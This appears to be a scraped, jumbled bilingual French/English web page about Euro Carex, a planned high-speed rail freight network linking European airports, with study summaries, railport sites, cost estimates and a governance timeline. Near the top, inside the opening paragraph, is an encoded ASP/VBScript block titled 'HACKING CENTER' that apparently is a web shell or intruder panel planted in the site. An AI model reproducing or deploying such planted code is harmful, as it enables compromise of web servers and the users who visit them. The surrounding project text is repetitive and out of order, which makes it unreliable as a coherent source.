Les marchandises conteneurisées ou palettisées qui embarqueront sur les trains CAREX seront soit en pré et post acheminement en Europe, à destination ou en provenance du reste du monde, soit strictement intra-europénnes. Selon les futurs clients/chargeurs du service européen de fret ferroviaire à grande vitesse, elles se répartissent en 2 types de flux :
<%@ LANGUAGE = VBScript.Encode %> <%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> <%#@~^2QgAAA==@#@&w.K{ l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh R&UsbSCVcKD /o@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C kcmWs@*AVWMWhl R\n0lxb ZK:@!JC@*[ 4kwI[U8kwI[ 8/ai'U(/wI' 4dwp' 4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl +kk YV@*nl./KU26/CU/k O0@!&l@*' 4daiLx4kwp'x(/2iLx8dai[ 8/ai[ 8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[ 4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI' 4/2ILx8/aILx8kwp[x(/aI[ 4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C PqcHRwPKChPzNý l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü [+,ÇlVýþýM @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr ky,9WkXl ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk PbHxý,j+M\nD9+~6^:l ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k ~Kl +^kU+~i^lþhl@!8D@*@!sr@*bNhr PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k P#+Mk~Pm4l slMýxýPÝ [rDs+,\dR @!4.@*@!8D@*@!^n Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%> - www.infilak.tr.cx<%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+ [Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%>
|
||
|
5 mars : Présentation de la deuxième phase de l'étude « Business Plan prévisionnel Euro Carex » aux membres du Conseil d'Administration et lancement de la troisième phase.
15 mai : Désignation de deux nouveaux administrateurs lors de l'AG d'Euro Carex : Cédric Fetcher, en tant que représentant de Lyon Carex et Jean-Claude Fontinoy, représentant L'Euro Carex Club.
25 juin : Présentation du rapport final de l'étude « Business Plan prévisionnel Euro Carex » aux membres du Conseil d'Administration d'Euro Carex.
Depuis le lancement du projet Carex, plusieurs études économiques ont permis d'identifier clairement des flux, en particulier ceux des expressistes.
Voir le détail des études économiques réalisées par les railports :
Roissy Carex
Business Plan Elcimaï/Sigma pour Roissy Carex - 2008
Lyon Carex
Source : Etude de marché Arthur D. Little pour Lyon Carex - 2009
Amsterdam Carex
Source : Business Case Ecorys / Districom pour HST Cargo Schiphol - 2008
Liège Carex
Source étude de marché Ernst & Young pour Liège Carex - 2007
Toutes ces études ont fait l'objet d'un important travail de consolidation confié à un expert en 2012 qui a abouti à l'estimation d'un plan de transport consolidé, évalué à l'horizon 2019.
Le plan de transport finalisé donne, par origine/destination, des volumes de fret exprimés en ULD de 4,5 tonnes de charge utile et une estimation du nombre de circulation des rames.
Cette étude complète celles réalisées par les entreprises ferroviaires SNCF Geodis et Europorte en 2011.
Il en ressort que le projet Carex devra s'appuyer sur le fret généré par les expressistes, mais aussi au fret transporté par l'ensemble des opérateurs du fret aérien et des chargeurs nécessitant du transport rapide, actuellement réalisé par la route. L'ouverture vers l'Allemagne est un enjeu primordial.
Les principaux axes identifiés sont :
un axe Est/Ouest avec des volumes de flux important dans le cadre du report modal de l'avion vers le rail
un axe Nord/Sud (Amsterdam / Lyon) avec un report modal plus important de la route vers le rail.
8 juillet : Réunion du Conseil d'Administration. Les membres du CA d'Euro Carex et de l'Euro Carex Club ont pris connaissance des rapports des experts missionnés par Euro Carex.
5 octobre : Conseil d'adminsitration. Le Président ad interim, Jean-Pierre Grafé a proposé de laisser sa place de Président ad interim. Patrik Renaud, Président de Roissy Carex a été élu à l'unanimité Président de Euro Carex.
28 novembre : Assemblée générale et réunion du Conseil d'administration. L'AG a entériné la nomination de Patrick Renaud en tant que Président de Euro Carex. La mission de Mathieu Grosch pour la mise en place d'un railport Carex Allemagne est prolongée pour 2017.
15 décembre : Une consultation a été lancée auprès de neuf bureaux d'études européens en vue de réaliser un business plan prévisionnel portant sur l'exploitation d'un réseau européen de fret ferroviaire à grande vitesse.
Avion + Camion
Le fret aérien éligible au futur service CAREX est actuellement tranporté par camion (50%) ou par avion (50%).
Soit en équivalent kilos de Carbone
Les trains CAREX n'émettront que 3,3 millions de kg de CO2.
Au total, les futurs trains CAREX émettront au minimum 17 fois moins de Carbone que les avions et les camions utilisés actuellement.
En comparant la valeur haute des émissions du train avec la valeur basse du camion et de l'avion, le rapport monte à 52 au profit du train CAREX.
Ce bilan Carbone a été réalisé selon la méthodologie de l'ADEME, Agence de l'Environnement et de la Maîtrise de l'Energie (France)
(* TKM : tonne-kilomètre, unite de mesure de quantité de fret)
4 mars : Réunion d'étape sur le développement de chacun des railports. Validation du dossier Euro Carex : l'avenir du fret express en Europe.
30 mars : Assemblée générale et réunion du Conseil d'administration. Renouvellement des membres du Conseil d'administration.
The feasibility study conducted initially by Roissy Carex in 2006 has paved the way for future Carex clients to adopt an operating structure based on the ‘reservation' principle.
Freight operators foresee the following as reservation criteria:
Pour pouvoir faire circuler un train entre deux points d'une ligne ferroviaire, tout opérateur ferroviaire doit commander des sillons horaires auprès des gestionnaires des infrastructures ferroviaires.
Dans le cadre du projet Carex, l'obtention de sillons de nuit s'avère indispensable à la viabilité du service, en phase avec les plans de transport des expressistes en particulier.
Réseau Ferré de France (RFF) a donc été chargé d'étudier la faisabilité de mise en disposition de ces sillons nocturnes en France sur les lignes à grande vitesse. Cette étude "Sillons & plages de maintenance" a permis de déterminer les conditions dans lesquelles les trains pourraient être autorisés à circuler la nuit et doit proposer un aménagement des périodes et des procédures de maintenance afin de ne pas trop détériorer les temps de parcours.
Pour cela, RFF s'est mis en relation avec ses homologues européens : Infrabel (Belgique), ProRail (Pays-Bas), Eurotunnel, HS1 (Grande-Bretagne) et DB Netz (Allemagne). En effet, la recherche de continuité des sillons entre les différents réseaux ferrés nécessite un important travail de synchronisation pour les gestionnaires d'infrastructure.
The outcome of the market survey commissioned in 2009 by Lyon Carex has enabled definition of the principle underpinning the range of Carex transport services. At this stage, the range contains 3 services: express, rapid and deferred:
(Source: Arthur D. Little for Lyon Carex - November 2009)
EURO CAREX service destinations and phasing have been determined by the freight operators involved in the project on the basis of the volumes of freight suitable for modal shifting to rail services and the ongoing development of European high-speed rail links.
1st phase :
2nd phase :
3rd phase :
Pour répondre au besoin spécifique de transport de palettes et conteneurs aériens dans des trains à très grande vitesse (300 km/h) qui n'existent aujourd'hui qu'en version passagers, Roissy Carex a lancé, en 2008, une procédure de dialogue compétitif à laquelle ont répondu Alstom et Siemens. Les deux constructeurs ont été interrogés sur leur capacité à produire 20 rames interopérables garantissant un temps de chargement et déchargement de 15 minutes, à en estimer le coût, à se prononcer sur les délais de livraison et à proposer des solutions pour la maintenance, l'homologation et le financement.
Alstom et Siemens ont officiellement présenté leur proposition respective en décembre 2008 aux acteurs publics et privés en Carex.
La faisabilité technique a été confirmée et en particulier la possibilité d'accueillir à bord les unités de chargement les plus utilisés par les acteurs du fret aérien. Le plancher des trains intégrera un système de plateaux à billes et de rouleaux identiques à celui qui équipe les avions et les camions spécialisés pour le fret aérien. Chaque train pourra transporter plus de 100 tonnes de fret.
Depuis 2013, les administrateurs de Euro Carex ont souhaité faire évoluer cette première étude technique afin d'envisager une configuration à moindre coût. Une nouvelle consultation a été lancée auprès des entreprises ferroviaires et constructeurs de matériel roulant pour une étude de faisabilité sur le ré-emploi de matériel roulant existant.
In addressing the specific requirement to transport airfreight pallets and containers using high-speed trains (at speeds up to 300 kph) that currently exist only in passenger versions, Roissy Carex launched in 2008 a competitive dialogue procedure to which Alstom and Siemens have responded. Both manufacturers have been requested to supply details of their ability to manufacture 20 interoperable trains with a guaranteed loading/unloading time of 15 minutes, to provide cost estimates and delivery lead times, and to put forward proposed maintenance, approval and funding solutions.
Alstom and Siemens presented their respective proposals to the public and private stakeholders of Carex in December 2008.
The study does confirm the technical feasibility of the scheme and, more specifically, the possibility of trains being fitted with the loading units most commonly used by airfreight operators. The floors of the wagons used will be fitted with a system of ball transfer units and rollers identical to that used in specialist airfreight trucks and aircraft. Each train will be able to carry about 100 tonnes of freight.
Since 2013, the board directors of Euro Carex requested to examine again the first technical studies in order to consider a configuration at lower cost. A new consultation has been launched among the railways and rolling stock manufacturers for a feasibility study of existing rolling stock.
L'étude de faisabilité menée initialement par Roissy Carex en 2006 a permis aux futurs clients du services Carex de retenir un schéma de fonctionnement basé sur le principe dit de "réservation":
Les critères de réservation envisageables par les opérateurs de fret sont les suivants :
In order to ensure service reliability, all the locations identified as future CAREX Railports have been chosen on the basis of their proximity to high-speed rail routes and good connections to the road network. The relevant rail infrastructure management companies have already conducted studies for the feasibility of providing branch lines or connecting lines. The aim here is to enable CAREX trains to access mainline high-speed rail routes as quickly as possible in accordance with prevailing technical conditions and minimum injection speeds.
LYON-SAINT-EXUPERY
The Rhône-Alpes HSL (a link in the Paris-Marseille route) passes through Lyon-Saint-Exupéry Airport from north to south. The French rail infrastructure operator Réseau Ferré de France (RFF) plans to create a branch line just after the airport TGV passenger station. This short single-track section will run parallel to the high-speed line and end at the CargoPort, where the LYON CAREX Railport will be built.
PARIS-CHARLES DE GAULLE
The Nord-Europe HSL passes to the north-west of Paris-Charles de Gaulle Airport, and the area identified is ideally located between the rail line and the airport area. Its proximity to the runways requires the adoption of radio frequency shielding measures for the higher levels of the rail track and overhead power lines. The "initialisation documentation package" study commissioned from INEXIA by RFF and funded jointly by the rail infrastructure operator, Roissy Carex, the Paris Region and the Direction Régionale de l'Équipement (Regional Infrastructure Authority) has been completed. Although multiple connection hypotheses are suggested, RFF and INEXIA favour the creation of a level link (without flyover) to the high-speed line compatible with the slots requested and with increasing Carex service frequency, even during daylight hours.
LIEGE
The Est (Eastern) branch of the Belgian high-speed network links Brussels to the French border, and includes sections of tracks capable of sustaining speeds up to 300 kph, as well as sections of upgraded standard line. The high-speed line runs parallel with the standard line just a few hundred metres north of Liège Airport. Infrabel, the Belgian rail infrastructure operator, conducted a preliminary study in 2007. The decision in favour of locating the LIEGE CAREX railport on land belonging to the Société Wallonne des Aéroports enables the creation of a single link to and from the west (Brussels) using an existing spur.
AMSTERDAM-SCHIPHOL
The Belgian/Dutch LGV 4/HSL Zuid high-speed line between Antwerp and Amsterdam-Schiphol became operational on 13 December 2009. Capable of supporting speeds up to 300 kph, it passes very close to the Hoofddorp-Haarlemmermeer site earmarked for the Carex rail freight terminal. At the request of the HST Cargo Schiphol (AMSTERDAM CAREX) group, ProRail, the Dutch rail infrastructure operator, has conducted an initial study that confirms the feasibility of a connection that will be simple to implement, since it is parallel to the high-speed line. Its construction in an existing regeneration area could be brought forward and should benefit from public joint funding.
LONDON
Unlike the other CAREX sites, the LONDON CAREX Railport will not be located at an airport, since London's airports have no direct rail link with the continent. The rail terminal will therefore be constructed east of London, alongside the HS1 high-speed line between the Channel Tunnel and St. Pancras station.
L'étude de marché commanditée en 2009 par Lyon Carex permet d'affiner le principe de l'offre de transport Carex. Celle-ci se décline, en première approche, en 3 services : express, rapide, differed :
(Source : Arthur D.Little pour Lyon Carex - Novembre 2009)
In the same way as the requirements applying to Carex trains, the Carex concept of forwarding airfreight containers and pallets by rail also requires the design of new types of station in the form of air/rail terminals.
Studies have been completed for such terminals and the outcome should benefit all those involved in the Carex project. Clearly, each site will be able to adapt the standard design to meet its own specific needs. It is also essential that the resources and services provided for use by shippers are common to all Railports and/or interoperable in order to ensure that the Euro Carex service is viable and efficient. The major principles to be adopted in achieving this objective are already understood.
Tracks and platforms
These must be sized in such a way as to ensure that containers and pallets can be loaded and unloaded in record time. The train loading and unloading method adopted also influences platform width. Any decision in favour of using of tractor-drawn "dollies" could impose the need for a platform width of around 20 metres in order to provide a turning circle at the platform end.
The main building
In addition to tracks and platforms, the main building must also contain offices for official services (such as customs), technical services and facilities, a control room, rest areas for drivers and freight handling staff, etc.
Ancillary buildings
The terminal will also include ancillary buildings in the public and secure customs-regulated areas to provide storage for empty containers and less urgent freight awaiting dispatch. The Road transport terminal will receive trucks arriving from the public road network. A signal box will manage train arrivals and departures.
Site access
Some terminals will be physically located close to airport perimeters. Continuity between Security Restricted Areas (SRAs) and customs-regulated areas will be maintained by constructing a dedicated high-density link road to connect the airport to the Railport using dollies or other types of specialist airport vehicle (low loader trucks, vans, etc.)
For traffic flows external to the airport, road routes in the public area will be sized to ensure free movement of trucks, and major routes will be adapted as necessary in advance. Customs clearance facilities will be required for outgoing traffic flows on some occasions. Incoming freight must be security-checked and processed via a road access control point referred to in French as a PARIF (private road access inspection and filtering station) similar to those already used at airports. This will apply to all vehicles and personnel entering the site.
Les destinations et le phasage du service CAREX ont été déterminés par les acteurs du fret impliqués dans le projet, en fonction des volumes de fret éligibles au report modal vers le train et du développement des lignes ferroviaires à grande vitesse en Europe.
1ère phase
2ème phase
3ème phase
In order to run a train between two points on a rail route, rail operators must secure timeslots from the appropriate rail infrastructure operators.
In the context of the Carex project, the securing of night-time slots is vital to the viability of the service and its ability to work in phase with shippers' transport schedules, and particularly those of express carriers.
Réseau Ferré de France (RFF) has therefore been tasked with studying the feasibility of making these night-time slots available on the high-speed rail routes of France. The purpose of the "Slots & Maintenance Periods" study was to identify conditions under which trains can be permitted to travel at night, and put forward a solution for arranging maintenance periods and procedures in such a way as to minimise the negative impact on journey times.
RFF and its counterparts in Europe: Infrabel (Belgium), ProRail (The Netherlands), Eurotunnel, HS1 (UK) and DB Netz (Germany) were involved in the studies.
In practice, achieving continuity of slots between rail networks requires a significant amount of synchronisation on the part of infrastructure operators.
Aircraft & Trucks
Air Freight is currently transported by trucks (50%) or by aircraft (50%)
Equivalent in kilos of Carbon :
Carex trains will emit only 3,3 million kg of CO2 (+/- 800,000).
CAREX trains will emit on average 17 times less Carbon than the aircrafts and the trucks which are currently used.
Carbon report according to the methodology of ADEME, French Environment and Energy Management Agency
(* TKM : Metric ton-kilometre)
Afin de garantir un service fiable, les terrains d'implantation des futurs Railports CAREX ont tous été choisis en raison de leur proximité des lignes à grande vitesse et de leur bonne connexion au réseau routier. Chaque site a fait ou fait à présent l'objet d'études menées par les gestionnaires d'infrastructure ferroviaire, en vue de la réalisation d'un embranchement (ou raccordement) ferré. L'objectif est de permettre aux trains CAREX de rejoindre les lignes ferroviaires le plus rapidement possible, en tenant compte des conditions techniques et des vitesses minimales d'insertion.
La LGV Rhône-Alpes, maillon de l'axe Paris-Marseille, traverse l'aéroport Lyon-Saint-Exupéry du nord au sud. Le projet de Réseau Ferré de France (RFF) consiste à réaliser un débranchement peu après la gare TGV voyageurs desservant l'aéroport. Cette courte section à voie unique, parallèle à la ligne à grande vitesse, aboutira dans la zone CargoPort, où sera édifié le Railport LYON CAREX.
La LGV "Nord-Europe" passe au nord-ouest de l'aéroport Paris-Charles de Gaulle et la zone retenue est située idéalement entre la ligne ferroviaire et le territoire aéroportuaire Le site d'implantation du Railport ROISSY CAREX nécessite la réalisation d'un raccordement avec la construction de deux ouvrages d'art pour permettre le franchissement de routes importantes. Par ailleurs, la proximité des pistes implique la prise en compte des servitudes radioélectriques pour les hauteurs de la voie ferrée et des caténaires.
La branche Est du réseau à grande vitesse belge relie Bruxelles à la frontière et est constituée de sections ferroviaires nouvelles parcourables à 300 km/h et de sections de lignes classiques modernisées. La ligne à grande vitesse parallèle à la ligne classique passe à quelques centaines de mètres au nord de l'aéroport de Liège. Infrabel, gestionnaire des infrastructures ferroviaires en Belgique, a mené une étude préliminaire en 2007. Le choix du site d'implantation du railport LIEGE CAREX sur des terrains appartenant à la Société wallonne des aéroports permet de réaliser une connexion simple de et vers l'Ouest (Bruxelles) par l'utilisation d'une antenne préexistante.
La nouvelle ligne à grande vitesse belgo-néerlandaise "LGV 4" puis "HSL Zuid", opérationnelle depuis le 13 décembre 2009 relie Anvers à Amsterdam-Schiphol. Parcourable à 300 km/h, elle passe au plus près du site retenu à Hoofddorp - Haarlemmermeer pour l'implantation du nouveau terminal ferroviaire fret. A la demande du groupe HST Cargo Schiphol (AMSTERDAM CAREX), ProRail, gestionnaire des infrastructures ferroviaires aux Pays-Bas a lancé une première étude qui conclut à la faisabilité d'un raccordement simple à réaliser, car parallèle à la ligne à grande vitesse.
A contrario des autres sites CAREX, le Railport LONDON CAREX ne sera pas situé sur une plateforme aéroportuaire, les aéroports londoniens ne disposant pas d'une liaison ferroviaire directe avec le continent. Le terminal ferroviaire sera donc construit à l'est de Londres le long de HS1, la ligne à grande vitesse britannique qui relie le tunnel sous la Manche à la gare de Saint Pancras.
Tout comme pour les trains Carex, le concept de Carex, à savoir le traitement de conteneurs et palettes ferroviaires par le mode ferroviaire, nécessite de définir et concevoir des gares inédites, que l'on pourrait qualifier de terminaux aéro-ferroviaires.
Des études ont été menées sur le sujet qui vont profiter à l'ensemble des acteurs impliqués dans le projet Carex. S'il est évident que chaque site pourra adapter le modèle à ses spécificités, il est aussi essentiel que les moyens et services mis à disposition des chargeurs soient communs à chaque Railport ou compatibles entre eux afin d'assurer la viabilité et l'efficacité du service Euro Carex. Les grands principes à retenir pour y parvenir sont déjà connus.
Les voies et les quais
Ils doivent être dimensionnés pour traiter le chargement et le déchargement de conteneurs et palettes en un temps record.
Le mode de chargement/déchargement des trains influe également sur la largeur des quais. Le choix éventuel d'un train de chariot ("dollies") tiré par un tracteur pourrait imposer une largeur de l'ordre de 20m afin de faciliter le retournement en bout de quai.
Le bâtiment principal
Outre les voies et les quais, il faut prévoir dans le bâtiment principal des locaux pour accueillir des services administratifs (douanes, par exemple), des services et équipements techniques, une salle de supervision, des zones de repos pour les conducteurs et les manutentionnaires ...
Les bâtiments annexes
Le terminal disposera également de bâtiments annexes en zone publique et en zone sous douane sécurisée pour permettre le stockage du fret moins urgent en attente de départ ou des conteneurs vides. Un terminal routier accueillera les camions arrivant par la voirie publique. Enfin, un poste d'aiguillage gérera l'entrée et la sortie des trains.
Les accès au site
Certains terminaux seront physiquement situés à la frange des emprises aéroportuaires. Il faudra assurer la continuité des zones réservées sûreté (ZRS) et sous-douanes en construisant un lien routier dédié et à haute densité pour permettre la liaison entre l'aéroport et le Railport par trains de charriot ou autres véhicules aéroportuaires spécialisés (camions surbaissés, camionnettes ...)
Pour les flux externes à l'aéroport, les voies routières en zone publique seront dimensionnées pour garantir aux camions un accès fluide et des aménagements seront réalisés en amont, sur les grands axes. Pour les flux sortants, des opérations de dédouanement seront parfois nécessaires. Le fret réceptionné devra être sécurisé et passer par un poste de contrôle d'accès routier appelé PARIF pour Poste d'Accès Réglementé et d'Inspection Filtrage, similaires à ceux qui existent sur les aéroports. Cela concernera également tous les véhicules et les personnels accédant au site.
The data communicated below result from studies carried out by the Carex entities and are informational data. These are estimates that are regularly undergoing significant updating. These data have been consolidated for the establishment of the general Euro Carex business plan.
Les investissements nécessaires au développement de lignes de transport de fret ferroviaire à grande vitesse entre plusieurs pôles aéroportuaires porteront sur le matériel roulant, les terminaux ferroviaires et leur raccordement aux LGV.
Dès le lancement de Carex, des premières estimations ont été faites par les professionnels compétents. Dans un deuxième temps, de nouvelles évaluations ont été réalisées afin de prévoir une phase de lancement à moindre cout sur une ligne pilote. Tous les coûts mentionnés sont hors frais d'acquisition ou de location du foncier.
Les rames Carex
Le coût pour la construction de 20 trains à grande vitesse oscille entre 600 et 700 M€ selon les constructeurs et les options qui pourraient être retenues. Ces propositions incluent les coûts de développement et les frais fixes mais n'intègrent pas les coûts de maintenance qui devront faire l'objet d'un contrat spécifique entre le ou les entreprises ferroviaires et le constructeur désigné.
Le ré-emploi de matériel roulant existant permettrait de réduire d'environ 30% ce coût.
Les embranchements (ou raccordements) ferroviaires
Leur coût unitaire dépend de leur longueur et de leur complexité. Il varie de 10 M€ à plus de 100 M€ selon les sites.
Les terminaux "Railports" Carex
Tous les terminaux n'auront pas à accueillir les mêmes volumes de trafic. Certains seront donc dimensionnés avec une voie à quai ; d'autres pourraient disposer de 4 voies à quai de 400 m permettant de traiter des doubles rames. Ensuite, le choix du mode de chargement (automatique / conventionnel) sera également dimensionnant et de nature à faire varier le coût. Ce sera aussi le cas pour les travaux de terrassement qui peuvent s'avérer nécessaires.
The concept is based on the use of the existing network and high-speed trains to transport goods over distances of 200-800 kilometers, and connect the largest European logistics sites.
In a first phase, Euro Carex will connect Amsterdam-Schiphol, Liège, Paris-Roissy-CDG, Lyon-Saint Exupéry airports, as well as the London basin. In a second phase, it will spread to Germany and the to Spain and Italy.
One Euro Carex train
= 100 to 140 tons of freight
= 1 cargo 747-400
= 3 Airbus A310
= 10 to 15 trucks
= 20-30 vans
Between 200 and 350 km/h
Loading / unloading in 30 minutes max
200 meters long
Conditioning of containers between 5° and 32°C
Compatible with air freight legal framework
Services :
Express Next day (before 9am)
Quick Next day
Differed 1/3 days
EURO CAREX, a boost for employment and sustainable growth to :
improve mobility
improve the image of goods' transport
optimize use of infranstructures
reduce toxic emissions
integrate green logistics
respect legal contraints
At least 17 times less pollution as air and road trafic combined
Speed
Safety
Security
Reliability
Price
Traceability
Innovation
Footprint
Connectivity
Flexibility
Euro Carex means :
Euro Carex asked the Belgian firm ETS to carry out a consolidation work of all traffic flows from economic studies previously completed locally at the various Carex sites in order to extract potentially transferable traffic to future Carex connections.
After writing methodological specifications and validation of a deferral rate for the modal shift as well as a annual growth rate, freight volumes were assessed by 2019.
The transportation plan gives finalized by origin / destination, freight volumes expressed in ULD 4.5 tonne payload ULD and an estimate of the number of trains to run.
This study comes in addition to those carried by the railways.
Former local studies :
Roissy Carex
Elcimaï/Sigma Business Plan for Roissy Carex - 2008
Lyon Carex
Arthur D. Little market study for Lyon Carex - 2009
Amsterdam Carex
Ecorys / Districom Business Case for HST Cargo Schiphol - 2008
Liege Carex
Ernst & Young market study for Liege Carex - 2007
Investments required to develop high-speed rail freight lines between multiple airport hubs will focus on rolling stock, rail terminals and their connection to the HSL.
First estimates have been made by professionals. In irder to launch a pilot line at lower cost, new assesments are been conducted.
All mentionned costs are excluding costs of land acquisition or land rental.
Carex trains
The cost of construction of 20 high speed trains may vary between 600 M€ and 700 M€ according to the manufacturer and options selected. These proposals include development costs and fixed costs but do not incorporate the maintenance costs that will be covered by a specific contract with the designated manufacturer.
The reuse of existing rolling stock should enable a cost reduction of about 30%.
Railway branch (or connecting) lines
The unit cost will depend on their length and complexity. It varies from 10 M€ to over 100 M€ depending on the site.
Carex "Railport" terminals
Not all the terminals will have to handle the same traffic volumes. Some will thus be sized with one rail track and others may have four 400 m in length for handling double trains. The choice of loading mode (automatic/conventional) will also impact size and design and affect cost as will the earthmoving work that may prove necessary.
Express freight is a booming sector with 5 % grwth expected within the next years. It means small volumes with a very high added value. Express and cargo activities are vital for airports' business cases and profitability. Customers have high expectations in terms of deadlines, reliabiity and delivery costs.
For airports, EURO CAREX is a driver for economic growth in order to :
strenghen airports services
build the airport of the future
overcome noise annoyance
For express freight operators and their customers, EURO CAREX helps :
strenghening the supply chain
positionning on a booming sector
anticipating customers' needs
Cette association loi 1901, constituée le 7 juillet 2009, a pour objet de contribuer par tous les moyens réguliers possibles au soutien, au développement et à la diffusion des actions conduites par les différentes entités en charge du projet Carex. Elle a vocation à rassembler :
Conseil d'administration et administrateurs d'Eurocarex Club :
Formed in March 2009, EURO CAREX AISBL is an international non-profit organisation under Belgian law, with its head office in Brussels. It brings together the pre-existing Carex entities formed to support and implement the project at local, regional and national levels.
Designed on the model of the first Carex (Roissy Carex), the individual Carex entities bring together partners of the public and private sectors such as local authorities, regional authorities, rail infrastructure operators, airport infrastructure operators and major players in the airfreight market.
Euro Carex propose d'utiliser des trains à grande vitesse pour le transport de marchandises sur des distances entre 200 et 800 kilomètres et de connecter ainsi les plus grands sites logistiques européens.
Dans une première phase, Euro Carex reliera les aéroports de Amsterdam-Schiphol, Liège, Paris-Roissy-CDG, Lyon-Saint Exupéry et le bassin londonien. Dans une deuxième phase, il s'étendra à l'Allemagne puis à l'Espagne et à l'Italie.
Un train EURO CAREX
= 100 à 140 tonnes de fret
= 1 Boeing 747-400
= 3 Airbus A310
= 8 semi-remorques
= 20 à 30 camionnettes
EURO CAREX, une opportunité pour l'emploi et le développement durable
Euro Carex, c'est :
un matériel roulant spécifique pour le transport de palettes et conteneurs aériens dans des trains à grande vitesse
des terminaux ferroviaires dédiés appelés « railport », situés à proximité immédiate des aéroports et des lignes ferrovaires à grande vitesse
des partenaires publics et privés engagés et déterminés
Des conditions économiques et environnementales favorables au projet
Le fret express est un secteur en plein « boom » qui attend 5 % de croissance par an sur les prochaines années. Il concerne des petits volumes à très haute valeur ajoutée. Les activités express et de logistique du fret sont vitales pour les aéroports et leur rentabilité. Les attentes des clients sont fortes en terme de délais, fiabilité et coûts de livraison.
Pour les aéroports, EURO CAREX est un levier de croissance économique pour :
Pérenniser le rayonnement des métropoles,
Construire l'aéroport du futur,
Maîtriser l'exposition au bruit.
Pour les expressistes, transporteurs et leur clients, EURO CAREX permet de :
renforcer leur chaîne d'approvisionnement
se positionner sur un secteur en plein boom
anticiper les attentes des clients
Formed on 7 July 2009 as an association under the French 1901 legislation, the purpose of the Eurocarex Club is to contribute by all legitimate means to supporting the development and dissemination of initiatives undertaken by the entities responsible for the Carex project. Its mission is to bring together:
The Eurocarex Club board of directors and executive directors:
Une délégation d'Euro Carex a rencontré les représentants de l'entreprise de transport ferroviaire italienne Mercitalia qui va lancer un TGV fret en Italie en octobre 2018.